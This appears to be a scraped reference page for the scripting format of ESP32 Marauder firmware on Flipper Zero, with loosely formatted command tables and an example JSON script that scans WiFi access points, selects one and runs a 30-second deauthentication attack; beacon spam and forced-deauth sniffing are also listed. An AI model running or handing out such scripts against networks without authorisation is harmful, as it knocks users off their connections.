cd
A comprehensive guide to scripting the ESP32 Marauder firmware for automated WiFi security testing with Flipper Zero.
| Parameter | Values | Description |
|---|---|---|
description |
String | Script purpose explanation |
repeat |
Integer (default: 1) | Total script repetitions |
enableLed |
true | false | LED feedback toggle |
savePcap |
true | false | Auto-save packet captures |
| Command | Syntax | Description |
|---|---|---|
scan |
{
"type": "ap" | "station",
"timeout": seconds,
"channel": 1-11
}
|
WiFi device scanning |
select |
{
"type": "ap" | "station" | "ssid",
"filter": "all | contains -f '{SSID}'...",
"indexes": [0,1,2...]
}
|
Target selection/filtering |
deauth |
{
"timeout": seconds
} |
Deauthentication attack |
sniff* |
{
"timeout": seconds,
"forceDeauth": true|false,
"channel": 1-11
}
|
Packet capture commands |
beaconList |
{
"ssids": ["SSID1", "SSID2"],
"generate": number,
"timeout": seconds
}
|
Beacon frame spam |
exec |
{
"command": "CLI command"
} |
Raw command execution |
delay |
{
"timeout": seconds
} |
Stage pause |
| Command | Description |
|---|---|
listap -a |
List all access points |
attack -t deauth |
Start deauth attack |
clearlist -a |
Clear target lists |
// Example Marauder script
{
"meta": {
"description": "Basic AP scan and deauth script",
"repeat": 1,
"enableLed": true,
"savePcap": true
},
"stages": [
{
"scan": {
"type": "ap",
"timeout": 10,
"channel": 1
}
},
{
"select": {
"type": "ap",
"filter": "all",
"indexes": [0]
}
},
{
"deauth": {
"timeout": 30
}
}
]
}
{SSID} or {MAC} placeholders in filtersapps_data/marauder/